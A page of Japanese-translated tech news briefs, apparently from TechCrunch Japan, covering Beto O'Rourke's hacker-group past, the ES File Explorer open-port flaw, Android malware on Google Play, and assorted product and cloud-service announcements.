タグ: computing

元ハッカーが初めて米大統領になるかもしれない

民主党の大統領候補Beto O’Rourke(ベト・オルーク)氏が、数十年前の悪名高きハッキンググループのメンバーだったことを明かした。

この元下院議員はテキサスのハッカーグループ「Cult of the Dead Cow」のメンバーだった。このグループはインターネット時代の初期のハクティビズム(Hacktivism、政治活動社会活動などを含むハッカー主義)に影響を与えたことで知られ、Windowsをハッキングするコードを作った。1990年代にはインターネットを抗議運動のためのプラットホームとして利用し、人権の重視を訴え検閲を非難した。その多くのリリースの中では、リモートアクセスとアドミニストレーションのツール「Back Orifice」がとくに有名だ。

このハッカーグループの一件を報じたロイターの記事によると、当時のオルークのハンドル名は「Psychedelic Warlord」だった。

彼はその後政治家への道を進み、2005年にエルパソ市の市会議員に当選してからは、ハッカーグループのメンバーだったことが自分の政治家としての成長を傷つけないか心配するようになった、という。グループのメンバーたちはオルークの秘密を護ったが、彼自身はロイターに、グループとの縁を認めた。

ロイターは彼を「米国の政治史における最も傑出した元ハッカー」と記し、その彼は米国時間3月14日に、米大統領に立候補すると発表した。

もしも彼がホワイトハウスを勝ち取ったら、彼は初めてのハッカー大統領になる。

オルークの履歴を見ると、アメリカが現在直面しているテクノロジーの問題にこの候補者がどのようにアプローチし、どのように問題を理解するかわかる気がする。テクノロジーに関して、かなり本格的な知識と理解を持った人が二大政党から大統領選に出馬するのは、これがほとんど初めてだろう。彼なら、テクノロジーが持ち込む良い面と諸問題に、政策のレベルで厳しく配慮し対応できるのではないか。

「インターネットには民主化する力がある、と思っている。私の個人的経験から言っても、インターネットは人の生き方を変える。そしてインターネットの上では、アイデアと技術を分かち合う国中の人びとの途方もない知性を有効に利用できる」。オルークはロイターにこう語っている。

この46歳氏はまだ支持者たちに、この新たな発覚について述べていない。

関連記事: サイバーセキュリティ強化のためにチェックすべきトップ5

[原文へ]
(翻訳:iwatani、a.k.a. hiwa

Google CloudのスピーチAPIが安くなりサポート言語も21に増えた

Googleが今日、Google Cloud上のSpeech-to-TextText-to-SpeechAPIをアップデートし、主にエンタープライズユーザーにとって関心があると思われるいくつかの新たな機能を導入するとともに、サポートする言語を拡大し、そして料金を下げた。〔正式名は、Cloud Speech-to-Text API、および、Cloud Text-to-Speech API。〕

力点はSpeech-to-Textの方に置かれているが、Text-to-Speechの方も31の新しいWaveNetと24の新しい標準音声が加わるなど、メジャーなアップデートであることに変わりはない。またサポートする言語は、以下の7つが増えた: デンマーク語、ポルトガル語、ロシア語、ポーランド語、スロバキア語、ウクライナ語、そしてノルウェーのブークモール。これらはまだベータだが、これでサポート言語は計21になる。

オーディオの再生をデバイスの特性に合わせて最適化する機能もある。ささいな改良かもしれないが、音声で対話的に応答するコールセンターや、ヘッドセットを使うアプリケーションではありがたいだろう。

Cloud Speech-to-Textの方は、デベロッパーが複数のチャネル上のユーザーをサポートしなければならない状況(電話会議など)向けに、使いやすさが向上した。そのために同社は昨年、マルチチャネルの音声認識をベータで導入、そして今回それが、一般供用となった。

また、ビデオや高性能電話用のプレミアムのAIモデルも昨年ベータでローンチし、主に短いクエリや音声コマンド用のスタンダードモデルよりも書き起こしエラーが少なくなる、と約束された。この高性能AIモデルもやはり今回、一般供用となった。

新しい機能だけでなく、今回のアップデートではSpeech-to-Textの料金が値下げされた。Googleのdata-logging programに参加しているユーザーなら、ビデオを書き起こしするためのスタンダードとプレミアムのモデルの利用料が33%安くなる。ただしこの事業に参加すると、ユーザーデータがGoogleのモデルの訓練のために使われる。そのデータにアクセスするのは特定の社員のみで、プロダクトの訓練や改良以外の目的には使わない、とGoogleは約束しているが、どんなに安く使えてもそんなのは気持ち悪い、と思うユーザーもいるだろう。

でも、通常のプレミアムビデオモデルは、データロギングに参加しなくても今度から25%安くなる。前と同じく、最初の60分はやはり無料だ。

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

Operaの無料VPNがAndroid上のブラウザーアプリに登場、ネイティブアプリは復活せず

OperaはVPNをバンドルした初のブラウザーだが、今度はその努力をモバイルに広げようとしている。

同社の今日(米国時間2/8)の発表によると、そのAndroid上のブラウザーアプリが、無料のVPNの提供を開始する。その機能はベータユーザーに徐々に展開される。VPNは無料で無制限、アメリカとヨーロッパとアジアの位置にセットできる。“optimal”にセットすると、今可利用な中で最速の接続にセットされる。VPNをonにするとユーザーのトラフィックのデータをOperaが集めないので、ユーザーの位置やデータを追跡するのが困難になる。

粒度の設定も可能で、VPNの利用を特定のタブに限定すると、検索エンジンでローカルな結果が得られるようになる。

Operaは前に、AndroidiOS用にVPNアプリを提供していたが、それらは昨年閉鎖した。新しい戦略は、その技術を直接ブラウザーに組み込んで、競争上の優位を獲得すると同時に、ユーザー数も増やしたい、というものだろう。iOSに関しては、まだローンチの話はない。

同社のブログは曰く: “VPNをAndroidのブラウザーに内蔵する理由は、日常使うモバイルのブラウザーで検索するとき、保護層をユーザーに提供するためだ”。同社は昨年、Nasdaqに上場した

OperaのVPNは2015年の買収の産物で、さまざまなプライバシー機能の一部だった。そのほかに、クッキーダイアログボックスのブロック暗号通貨の採掘禁止広告ブロックなどがある。暗号通貨をサポートする機能もあり、それらは暗号通貨ウォレットWeb 3アプリのサポートなどだ。そして今週は、ブラウザーの中から暗号通貨を買える機能が登場した。

さらにOperaには、“Touch”ブラウザーというものがあり、ホームボタンのないデバイスで使える。それはAndroidでローンチし、昨年後半にiOS版も出た

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

Samsungのメモリチップ新製品でスマートフォンの内蔵ストレージが1TBになるだろう

スマートフォンがアプリや写真やビデオなどですぐに満杯になってしまうから、かったるいって? でも近未来にはスマートフォンの内部ストレージが1TBになり、しかもふつうのメモリーカードの10倍速くなるかもよ。

Samsungはスマートフォンのメーカーとしてよく知られているが、同社の本当の稼ぎ頭であるメモリ部門が今日(米国時間1/29)、スマートフォン用の1TBのフラッシュメモリーの量産を開始した、と発表した。それがいつスマートフォンに搭載されるのか、それは分からないが、今年の前半の間に生産量を増やすそうだ。

Samsungは曰く、“スマートフォンのファンはもうすぐ、ノートブックPCの高級機なみのストレージ容量をエンジョイできるようになる。もう、予備のメモリーカードを持ち歩く必要はない”。

容量1TBといえば、同社のこれまでの最大容量の倍だ。それによってGalaxy Note 9の512GBモデルが可能になり、さらに512GBのSDカードをプラスして‘テラバイト’の壁を超えたのだ。しかしこれからは、カードがなくても本体だけで1TBになり、しかもパフォーマンスもアップするらしい。

Samsungによると、その新しい技術によりスピードは最大で毎秒1000メガバイト(MB/s)に達した。全長5GBのHDビデオなら、わずか5秒で転送できる。従来のmicroSDカードなら1分近くもかかっていた。速くて大容量となれば、高画質のビデオ撮影も十分に可能だろう。

しかし、搭載機の年内出荷は可能なのか? Samsungの噂工場は、Galaxy Note 10が1TBモデルだと言っているが、まだなにも証拠はない。今後のリークを、拾いそこねないようにしたいね。

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

Googleが通話ログやSMSのメッセージにアクセスする未審査Androidアプリを削除

Googleが今、通話ログやSMSのメッセージにアクセス許可を求めるアプリで、Googleのスタッフが検査していないものを削除している。

Googleによるとこれは、機密性のある通話やテキスティングのデータにアクセスするアプリをGoogle Playからなくす努力の一環だ。

Googleは10月に、デベロッパーには新しくて安全な、プライバシーに配慮したAPIを使ってほしいので、今後Androidアプリがレガシーのパーミッションを使うことを禁止する、と発表した。これまでは多くのアプリが、通話ログやテキスティングのデータへのアクセスをリクエストして、ソーシャルな共有やスマートフォンのダイヤラーをリプレースするために、二要素認証のコードを調べようとしていた。しかしGoogleの認識では、このレベルのアクセスを一部のデベロッパーが悪用し、パーミッションを誤用して機密データを集めたり、単純に間違った扱い方をしたりしている。

GoogleでGoogle Playのプロダクト管理を担当しているPaul Bankheadは次のように語る: “今度の新しいポリシーは、アプリがその主要な用途を実現するために機密データへのアクセスを要し、ユーザーもそのことを理解している場合のみ、これらのパーミッションを許可するようにしていくためだ”。

通話やテキスティングのデータへのパーミッションを求めることを今後も維持したいデベロッパーは、パーミッション宣言に記入しなければならない。

Googleはそのアプリと、アクセス許可を維持したい理由を調べる。なぜこのデベロッパーはアクセスをリクエストするのか、それによるユーザーの利益は何か、逆に、通話やテキスティングのデータにアクセスされることのリスクは何か。

Bankheadによれば、新しいポリシーでデータアクセスが禁じられると、実用性がなくなるアプリもありえる。

Googleによると、すでに数万のデベロッパーがアプリのニューバージョンを提出しており、その中には通話やテキスティングのデータへのアクセスを不要にしたアプリもある。それ以外のアプリは、パーミッション宣言を提出した。

宣言を提出したデベロッパーは3月9日までに、承認またはパーミッションの削除要請を受け取る。どんな用途なら承認される(データアクセスが許される)のかに関してGoogleは、承認される用例のリストを用意している。

これまでの2年間だけでも、Androidアプリやそのほかのサービスによる、通話やテキスティングデータの重大なリーク事件がいくつかあった。2017年の晩くには、人気の高いAndroidのキーボードアプリai.typeが、ユーザー3100万人という大きなデータベースを露出し、3億7400万もの電話番号などが盗まれた。

Another huge database exposed millions of call logs and SMS text messages

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

ファイルマネージャーアプリES File ExplorerはAndroid機のデータを外部に露出する

とても多くのユーザーが使っているAndroidの人気アプリが、なぜバックグラウンドで秘かにWebサーバーを動かしているのだろうか?

そのES File Explorerは、2014年以来5億以上ダウンロードされた、と豪語している。これまででいちばん多く使われたアプリのひとつだ。シンプルなので、誰にも好かれた。それは単純なファイルエクスプローラーであり、ユーザーは自分のAndroidスマートフォンやタブレットのファイルシステムを調べて、ファイルやデータやドキュメントなどにアクセスできる。

しかしこのアプリは、楽屋裏で機能最小限のWebサーバーを、そのデバイスの上で動かしている。それによってAndroidデバイスの全体をオープンにしてしまい、データ窃盗などの攻撃の、為すがままになる。

フランスのセキュリティ研究家Baptiste Robert、ハンドル名Elliot Aldersonが先週、外部に露呈しているポートを見つけ、その発見を水曜日(米国時間1/16)にツイートで発表した。ツイートする前に彼は、本誌TechCrunchに、露呈しているポートを使ってデバイスからデータを盗み取れることを、デモしてくれた。

“そのローカルネットワークのすべてのデバイスが、データをそのデバイスにインストールされてしまう”、と彼は言った。

彼が書いた簡単なスクリプトで、同じネットワーク上の別のデバイスから、画像やビデオやアプリの名前、そしてメモリカード上のファイルさえ引っ張り出せることを、彼はデモした。被害者のデバイス上でアプリをリモートで立ち上げることすらできる。

彼はそのスクリプトを、テスト用に本誌TechCrunchに送ってきた。要らないAndroidスマートフォンを使って、彼が見たということを確認した。Robertによるとアプリのバージョンは4.1.9.5.2で、それより前のものにオープンなポートがある。

彼曰く: “いいことではないね”。

ES File Explorerが動いているAndroidデバイスと同じネットワーク上のデータを取得するスクリプトをセキュリティ研究者が作った(画像は提供されたもの…この記事の筆者はスクリプトを実際に動かしていない)。

ES File Explorerのメーカーにコンタクトしたが、まだ返事はない。何か来たら、この記事をアップデートしよう。

これはインターネット上の悪人が一般的に悪用できる欠陥ではないから、やられる心配は少ない。悪事を働こうとする奴は、被害者と同じネットワークにいなければならない。つまり、同じWi-Fiネットワーク、ということだ。でも万一そいつがネットワークのパーミッションを持っていたら、こんな出来損ないのアプリを悪用してデータを盗むことができる。だから安心はできない。

それは、HTTPプロトコルを使ってビデオを他のアプリにストリーミングするために使われる、という合理的な説明もある。しかし一方、露出したポートという問題を過去に経験したことのある人は、それは危ない、と言う。そのアプリは、こんなことも言っている: “この機能を有効にすれば、これによってあなたのスマートフォン上のファイルをあなたのコンピューターから管理できる”。…しかし‘あなたのコンピューターから’とは限らない。

そして、アプリを開いた途端にそれらのファイルは、そのWebサーバーが通信のために開いたポートによって外部へ露呈するのだ。そのことが、分からない人が多いだろう。

関連記事: サイバーセキュリティ強化のためにチェックすべきトップ5

画像クレジット: TechCrunch

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

Google Docs, Sheets, Slides, SitesがMaterial Designへ装いを一新

Googleが今日(米国時間1/15)、Google Docs, Sheets, Slides, Sitesのアップデートで待望のMaterial Designを実装する、と発表した。同社はG Suiteアプリケーションのこのアップデートを昨年、Google Driveのデザイン一新でテストしていた。

なお、デザインは一新されるが、機能の追加や変更はない。機能的には前のままで、ピクセルが増えたり減ったりする。つまり、デザインのリフレッシュだけがアップデートの目的だ。

アップデートが完了してあなたが気づくのは、インタフェイスのフォントが変わっている; コントロールもやや変わった; 新しいアイコンがある; といったところだ。あちこちで、色も変わっている。以上が、すべてである。

Googleは新しいデザインの展開を今日、G SuiteのRapid Releaseスケジュール上のサブスクライバから開始し、その人たちは15日以内に新デザインを取得する。アドミンがやや臆病でScheduled Releaseのスケジュールに固執しているところは、展開は2月11日ごろになる。いつものように、無料ユーザーに関してGoogleは無言だが、でもまあ、来月中には新デザインになるだろう、と思うけどね。

GoogleはMaterial DesignへのアップデートをWebやモバイルアプリの多くに対して過去数か月間やってきた。その最新の例のひとつがGoogle Calendarで、今回G Suiteの生産性アプリケーションが加わると、ほぼすべてが完了する。最後には、Material Designのガイドラインもアップデートしてもらいたい。

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

NetgearのメッシュギアOrbiルーターがギガビットクラスのWi-Fi 6をサポート

メッシュ用として気に入っているNetgearのOrbiが、大きくスピードアップした。その新しいルーターはRBK50と呼ばれ、Wi-Fi 6 802.11axをサポートしていて、メッシュを構成するルーター間をギガビット級のワイヤレスで接続する。〔主に家庭内メッシュのこと〕

WiFi 6はまだ新しい規格なので、サポートしているハードウェアはまだ多くない。以下、Netgearの発表声明から引用しよう:

業界トップのOrbi Mesh Wi-Fi Systemsが改良され、 4×4 Wi-Fi 6バックホールの1024 QAMをフィーチャーして、この専用ワイヤレスリンク間および、それと衛星間のスピードとカバレッジとキャパシティを増加する。

Qualcomm Technologies, Inc.のWi-Fi 6対応ネットワーキングSoCを使用しているWi-Fi 6用Orbiは、複数同時のWi-Fiストリームでも従来より高いパフォーマンスをサポートし、ギガビットのインターネットをさらに多くのデバイスに供給して、家庭のギガビットインターネットユーザーが新しいWi-Fi 6の利点を享受できるようにする。それは、次世代のモバイルやスマートホームデバイスの標準を目指した設計である。

この新しいルーターは2019Q3に発売される。価格の発表はない。

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

プログラミングをゲームのように遊べるScratchのv.3.0が出た、タブレットでも使える

使うに値する唯一の子ども向けプログラミング言語Scratchが、Scratch 3.0のローンチを発表した。この強力なオープンソースツールに、おもしろい新しい機能がいくつか加わった。

学齢期の子どものいない読者のために説明すると、Scratchはブロック方式のプログラミング言語で、小さなゲームや、スプライトやアニメのある“漫画”を作れる。そのシステムはけっこう複雑で、子どもたちはこれまで、Minecraftのプラットホームや、楽しいアーケードゲーム*、そしてこんなものまで作ってきた。〔*: アーケードゲーム, arcade games, arcadeは日本語で言えば“ゲーセン”。〕

Scratchのこのニューバージョンには、ハードウェアを制御する機能や、新しいコントロールブロックがある。

Scratch 3.0は次世代のScratchで、Scratchでもっといろんなものを、いろんなところで作れるようになった。数十個もの新しいスプライトがあり、サウンドエディターもすっかり新しくなった。そして新しいプログラミングブロックもたくさんある。Scratch 3.0は、ラップトップやデスクトップコンピューターだけでなく、タブレットでも使えるようになった。

Scratchはプログラミングをゲームのように楽しめるツールで、うちの子は今でも、これで何度も何度も遊んでいる。そんな力を持つプログラミング言語は、ほかにない。とくに小学校入学前ぐらいの子どもに最適の、プログラミング入門だ。今度のアップデートをぜひチェックして、そして作ったアニメはぜひクラスでシェアしよう!

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

Googleのレーダー技術によるジェスチャー入力方式SoliをFCCが認可、電波妨害問題をクリア

数年後にはタッチスクリーンを陳腐化するかもしれない、Googleのレーダーを利用するモーションセンサー技術を、アメリカの規制当局が認可した。Soli Projectと命名されたそのイニシアチブは2015年に、Googleの最先端の技術開発部門Advanced Technology and Projectsでスタートした

それ以降私たちは、Soliの技術的成果をいくつか見てきた。それはオブジェクトを認識でき、レーダーセンサーの消費電力を少なくできた。いちばん最近では、規制当局からの指示がきっかけで、もっと実用的な段階へ移行した。アメリカの連邦通信委員会(Federal Communications Commission, FCC)は今週初めに、Project Soliに対し、現在許されている以上の高い電力レベルでの運用を認めた。この政府機関はさらに、そのデバイスが“他のスペクトルのユーザーを妨害する可能性が極微なので”、航空機の中で使用してもよい、とした。

Soliのレーダーセンサーは25ドル硬貨サイズの小さなチップで、手や指のわずかな動きを高速高精度で追える。これによりたとえば、オーディオ装置ではボリュームのつまみを回さなくても、スピーカーの前で指をすり合わせるだけで音量を調節できる。FCCの今度の規制なら、スマートウォッチのボタンをエアプレスすることもできるだろう。

FCCは、安全性の懸念が一掃されればこのセンサー技術が公共の利益にも奉仕する、と言っている: “スマートフォンなどのデバイスをタッチをしない手のジェスチャーでコントロールできるようになれば、運動能力や発話能力、触知能力など多様な障害を持つ人びとを助けることができる。それにより、アメリカ社会のより多くの成員の生産性と生活の質が向上する”。

今本誌TechCrunchはGoogleに詳細を問い合わせているので、返事が得られ次第この記事をアップデートしたい。

FCCのこの認可の数か月前には、Facebookが、Soliのセンサーが高い電力レベルで運用された場合の電波妨害、という問題をこのお役所に持ち込んでいた。しかし両社は9月に合意に達し、 Soliは政府が許容したよりも高いがGoogleが求めたよりも低い電力レベルで運用される、という合意内容をFCCに届け出ていた。その合意内容が認可された、というわけだ。

この新しい分野でFacebookがルールを設けようとしたことは、理にかなっている。同社もまた、Oculusで同様のモーション技術を展開しようとしているからだ。Facebookはたとえば、腕の動きを作り出すデバイスで、ハグなどの社会的ジェスチャーをシミュレートする技術開発に投資している。

Googleのこの技術開発のアップデートはしかし、ある種の‘頭隠して尻隠さず’でもある。そう言いたくなるぐらい、最近の同社は問題含みの行為が多い。まず、Google+の大量のデータ漏洩、その前の、オンラインゴーストタウンの閉鎖。児童ポルノ対策の失敗。そして中国への再進出が、検索エンジンの検閲を伴うという報道

画像クレジット: Google

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

2018年のGoogle検索とその傾向: トップはWorld Cup, FortniteのGIF画像, Bitcoinだった

Googleの年末恒例のYear in Search(今年の検索)は、12か月にわたって私たちの関心を集めたイベントやストーリーや現象のデジタルな記録であるだけでなく、その年に何が社会で重要だったか、そしてときには、それがどこへ向かおうとしているのかを示す計算書でもある。そして2018年に世界はひとつのスポーツイベントに、ひとつの結婚に、有名人の死に、自然災害に、そして政治に釘付けになった。

2018年に、グローバルコミュニティはワールドカップ(World Cup)に縛り付けられた。決勝戦はフランス対クロアチアだった。どっちが勝ったか忘れた/知らない人はGoogleへどうぞ。さらに世界は、ミュージシャンや科学者、アーチストなど有名人の死の前で歩を止めた。グローバルなGoogle検索の上位10のうちの7つが、2018年に亡くなった人びとだった。それらは、理論物理学者で著作家のStephen Hawking, ラッパーMac Miller, DJ Avicii, コミック・ブックを作った象徴的人物Stan Lee, セレブのシェフで著作家/テレビのパーソナリティAnthony Bourdain, そしてファッションデザイナーKate Spadeだ。

映画では、Black Pantherがグローバルのトップテンに入り、またハリー王子と結婚してサセックス公爵夫人になった女優のMeghan Markleもテンに入った。

アメリカに限定しても傾向は同じだが、選挙の結果とハリケーンフローレンス(Hurricane Florence)、そして宝くじメガ・ミリオンズ(Mega Millions)はアメリカ独特だ。

2018年のアメリカの検索でカテゴリーとして多かったのは、まつげ、1980年代のファッション、投票の仕方、選挙権登録の仕方、ユニコーンケーキ(Unicorn Cake)、Ketoダイエット(ケトン体ダイエット)などだ。アメリカのニュースの検索でトップは、World Cup、その次がHurricane Florence、Mega Millions、選挙の結果、Hurricane Michaelだ。セクハラ疑惑に揉まれたキャバノー判事(Kavanaugh)の最高裁判事承認の件は、2018年で6番目に多く検索されたニュース記事だ。そのあとは、フロリダ州の銃撃事件、イギリス王室の結婚式、オリンピックの獲得メダル数、そして第10位、予算難航による政府閉鎖、と続く。

もっとおもしろいのは、“What is ___ ?”検索(ナニナニは何ですか?)のリストだ。アメリカでいちばん多くの人が尋ねたのはBitcoin、次が恐喝罪(racketeering)、DACA(Deferred Action for Childhood Arrivals)(アメリカで成長した不法移民の子の強制退去猶予)、政府閉鎖(government shutdown)、聖金曜日(Good Friday)となる。このほか、ゲームのFortnite、聴覚の錯覚“Yanny or Laurel”、ナショナリスト(nationalist)も、多く質問された。

ゲームの検索に絞ると、トップはFortniteだった。ゲームのGIF画像の検索でもトップは“Fortnite”、次いで“Default Dance,” “Dilly Dilly,” “Orange Justice,” “Black Panther”だった。

ビデオゲームの検索では、Red Dead Redemption 2, Fallout 76, Far Cry 5, そしてGod of Warも多かった。

  1. US-Google-Searches

  2. copy-copy-copy-top-5-tech-acquisitions

  3. copy-copy-copy-copy-top-5-tech-acquisitions-1

 View Slideshow
Exit

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

GoogleがIstioをGKEに統合、いよいよスタンダードツールの仲間入り

Googleが今日(米国時間12/11)、GKE、Google Kubernetes Engineのアップデートを発表し、それによりこのサービスに、Istioサービスメッシュのサポートが統合される。Istioのサポートは、現在ベータである。

Istioはまだ、Kubernetesが近年そうなったような高い知名度の用語ではないが、多くのエンタープライズにとって、クラウドネイティブなプラットホームを構築するための重要なビルディングブロックになっている。

Istioの中核的な機能は、Kubernetesをはじめさまざまなプラットホーム上で複数のマイクロサービスを互いに接続し、モニタし、セキュリティを図るためのオープンソースのサービスメッシュ〔mesh, 網の目〕だ。IstioとそのEnvoyプロキシなどのサブコンポーネントは、複数のマイクロサービスを統合し、それらのセキュリティを図り、ログデータを集積し、それらにより、Kubernetesのようなオーケストレーションのレイヤ(層)の上に新たな抽象化レイヤを提供する。

Google CloudのChen GoldbergとJennifer Linが、今日の発表でこう述べている: “Istioはマイクロサービスをもっとも有効に利用するための重要な役割を担う、と堅く信じている。そのためのIstioのやり方は、優れた可視性とセキュリティを提供することによって、コンテナ化されたワークロードをより容易に扱えるようにすることだ。このたびIstioがGKEに統合されたことによって、われわれはメジャーなクラウドプロバイダーとしては初めて、Kubernetesサービスとのダイレクトな統合を提供し、コンテナのライフサイクル管理を単純化した”。

GoldbergとLinはさらに強調して、Istioによってデベロッパーとオペレーターはアプリケーションをサービスとして管理でき、大量のさまざまなインフラストラクチャレベルの部位を見る・扱う必要がなくなる、という。また彼らによると、Istioを使うとネットワークトラフィックのすべてを暗号化できる。当然のようにGKE上のIstioには、Google CloudのモニタリングとロギングサービスStackdriverが統合されている。

Istioは、2017年の半ばにローンチした。そのプロジェクトは、GoogleとIBMとLyftのコラボレーションの産物だ。今夏7月にバージョン1.0に達し、Datadog, SolarWindsなどの企業がその後、自分たちのサービスにそれを統合するためのプラグインを作った。Cloud Foundryプロジェクトも、それをその、新しいトラフィックルーティングスタックのコアとして使い、Istioをサービスの中核としている。

関連記事: マイクロサービスの集まり(単一/複数アプリケーション)を安全に管理するプラットホームIstioをGoogleとIBMとLyftが共同で立ち上げ

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

Qualcommは7nmの8cxプラットホームでPC市場にさらに大きく賭ける気だ

QualcommはPC、とくにラップトップ市場でメジャーになることを望んでいる。Windows 10がARM上にもある今、それは単なる夢ではない。しかしこれまでのQualcommベースのWindows 10ラップトップは、PC用に特製されたSoC、Snapdragon 850を使っていたが、それは同社のスマートフォン用プラットホームの直接の子孫のようなチップだった。

しかし今日(米国時間12/6)同社が発表したSnapdragon 8cxプラットホームは、“これまでで最高のSnapdragon”と自画自賛され、同社のモバイルの専門技術とビルディングブロックを一部に使用しながらも、強力なPC向けに一から新たに設計されている。

8cxはPC向けに最適化され、ピーク時のパフォーマンスやマルチタスクにも十分対応する。それは初めての、7nmプロセスのPCプラットホームでもあるが、発売は2019Q3以降となる。

QualcommのSnapdragonプラットホームをPC(それをQualcommとMicrosoftは“Always Connected PC”(常時接続PC)というブランドで呼んでいる*)に使うとどうなるのか。Q社の売りによるとそれは、複数日の電池寿命でIntelのチップと同等のパフォーマンスが得られることだ。最初の世代のデバイスは電池寿命はグレートだったが、パフォーマンスはまだまだだった。今度の8cxでは、その点が改良されたとQualcommは約束している。そして同社は、その7nmチップは“従来のPC業界よりも数世代先を行っている”、とあえて〔10nmでつまづいた〕Intelを名指しせずに主張している。〔*: Always Connected PC, 日本ではHPのCore i5機が最初に使用。〕

8cxプラットホームをローンチしながらQualcommは、依然850をキープしている。8cxの位置づけは、既存の850プラットホームを補完して、ベンダーが多様な価格帯のPCを提供できるようにするための、プレミアムプラットホーム(ハイエンド機用チップ)だ。

8cxはQualcommのKryo 495 CPUとAdreno 860 GPUを搭載し、後者は4KのHDRモニターを駆動できる。またQualcommの最新の高速充電技術や、いつもの接続性オプション(Bluetooth, USB-C, LTE, …)により、常時接続をサポートする。

QualcommのSVPでモバイル部門のゼネラルマネージャーAlex Katouzianが、今日の声明で言っている: “パフォーマンスと電池寿命をつねに重視するわれわれは、7nmのイノベーションをPCに導入し、スマートフォンのような能力を持たせることによってコンピューティング体験を変革する。これまでで最速のSnapdragonプラットホームであるSnapdragon 8cxによって、弊社の顧客のみなさまは、複数日の電池寿命と複数ギガビットの接続性、および薄く軽くファンのないデザインによる強力なコンピューティング体験を、消費者と企業に提供できる”。

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

推論過程をGPUで加速するAmazon Elastic Inferenceはディープラーニングのコストを75%削減する

Amazon Web Servicesが今日、Amazon EC2のどんなインスタンスでもGPUによる推論の加速ができるサービスAmazon Elastic Inferenceを発表した。これにより、ディープラーニングのコストが最大75%削減できるという。

AWSのCEO Andy Jassyは、今朝のAWS re:Inventのステージでこう述べた: “従来のP3インスタンス(GPU常備のインスタンス)では通常、GPUの利用率がせいぜい10%から30%ぐらいで、エラスティックな推論用としては無駄が多い。それだけの費用やGPUを、無駄に使うべきではない。Amazon Elastic Inferenceでは、もっと費用効率の良い方法で推論エンジンを動かせるから、きわめて画期的なサービスだ”。

Amazon Elastic Inferenceは、モデルの作成/学習ツールAmazon SageMakerのノートブックインスタンスとエンドポイント用にも利用でき、“内蔵アルゴリズムとディープラーニングの環境を加速できる”、と同社はブログ記事で言っている。機械学習のフレームワークは、TensorFlow, Apache MXNet, そしてONNXをサポートしている。

[顧客の皆様には、仕事の性質に合った正しいツールを使っていただきたい。このたび発表するAmazon Elastic Inferenceを使うと、エラスティックな(伸縮性のある)GPUサポートを加えて、どんなEC2インスタンスの上でもスケーラブルな推論ができ、大幅な経費節約が可能だ。]

三つのサイズが提供されている:
(混合精度, mixed-precision, FP16とFP32の併用使い分け)

  • eia1.medium: 8 TeraFLOPsの混合精度パフォーマンス
  • eia1.large: 16 TeraFLOPsの混合精度パフォーマンス
  • eia1.xlarge: 32 TeraFLOPsの混合精度パフォーマンス

この新しいサービスを詳しく知りたい方は、こちらへ

more AWS re:Invent 2018 coverage

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

Androidユーザー50万人がGoogle Playからマルウェアをダウンロード

50万人以上のAndroidユーザーが、ドライブゲームを装ったマルウェアをダウンロードした——Googleの専用アプリストアでの出来事だ。

ESETのセキュリティー研究者Lukas Stefankoは、13本のゲームアプリ——同じ開発者による——の詳細をツイートした。その時アプリはまだGoogle Playでダウンロード可能だった。うち2本はアプリストアの人気ランキングに入っていたため、いっそう目立っていた、と彼は言った。

Googleが削除するまでに計58万回以上インストールされた。

ダウンロードした人はトラックか車のドライブゲームを期待していた。代わりに手にしたのは開くたびにクラッシュするバグだらけのアプリだった。

実際には、そのアプリは別のドメイン(イスタンブールのアプリ開発者が登録)からデータをダウンロードし、裏でマルウェアをインストールしながらアプリのアイコンを消していた。悪意のアプリが正確に何をするのかはわかっていない。VirusTotalにアップロードされたサンプルを見る限り、このマルウェアが何をするかはマルウェアスキャナーの間でも一致していない。はっきりしているのは、マルウェアに持続性があることだ——Android携帯またはタブレットをスタートさせるたびにアプリは立ち上がり、ネットワークに「フルアクセス」できるため、マルウェア作者はそれを利用して秘密を盗み出す。

本誌はイスタンブール拠点のドメイン所有者Mert Ozekに接触を試みているが、今のところメールへの返信はない。

またしてもこれはGoogleによる恥ずかしいセキュリティー欠陥だ。Googleはアプリとモバイルのセキュリティー対策でAppleに遅れを取っていることで長年批判されている。Appleは壁に囲まれた庭にどのアプリを入れるかに関してはるかに限定的で選り好みが強いと言われている。

GoogleはAndroidのセキュリティーを強化すべく、セキュリティー機能を改善し、きめ細かなアプリ許可制御を導入した。しかし、その後もGoogle Playアプリストアでは詐欺や悪意あるアプリとの戦いが続いており、Androidユーザーにとって最大の脅威の一つとなっている。Googleは昨年だけで70万以上の悪質アプリをアプリストアから削除し、悪意あるアプリがそもそもストアに入り込むのを防ぐために、バックエンドの改善を試みた。

しかし、それでもまだ十分ではないことが明らかだ。

Google広報は本誌の問い合わせに対してすぐにはコメントしなかった。

Gift Guide: The best security and privacy tech to keep your friends safe

[原文へ]

(翻訳:Nob Takahashi / facebook

Apple、watchOS 5.1.1を公開。一部Apple Watchの文鎮化問題を修正

AppleはwatchOS 5.1.1を公開した。前バージョンのwatchOS 5.1から一週間もたたないなか、一部のApple Watchが文鎮化するという報告を受けてのことだ。

このアップデートには、ほかにウォーキートーキー機能やアクティビティのリワードが一部表示されない問題などのバグ修正も含まれている。

watchOS 5.1は10月29日にiOS 12.1と共に公開されたが、ソフトウェアアップデートをインストールした後Apple Watchが 立ち上がらないという苦情を受けすぐに配信が停止された。Appleは、この欠陥アップデートが「少数」のユーザーに影響を与えた(詳細は語らず)ことを認め、「問題のあるユーザーはAppleCareに連絡をとってほしい。インストールが成功した人は何もしなくてよい」と発表した。

watchOS 5.1.1はwatchOS 5.1の全機能に加えて、グループFaceTimeオーディオ、新しい絵文字、新しい文字盤などいくつか新機能も追加された。

ほかに、セキュリティーアップデートも施され、アタッカーがカーネル特権を得られる重大な脆弱性が修正された。

[原文へ]

(翻訳:Nob Takahashi / facebook

GoogleのHome Hubがたった1行のコードで煉瓦になる(文鎮になる)

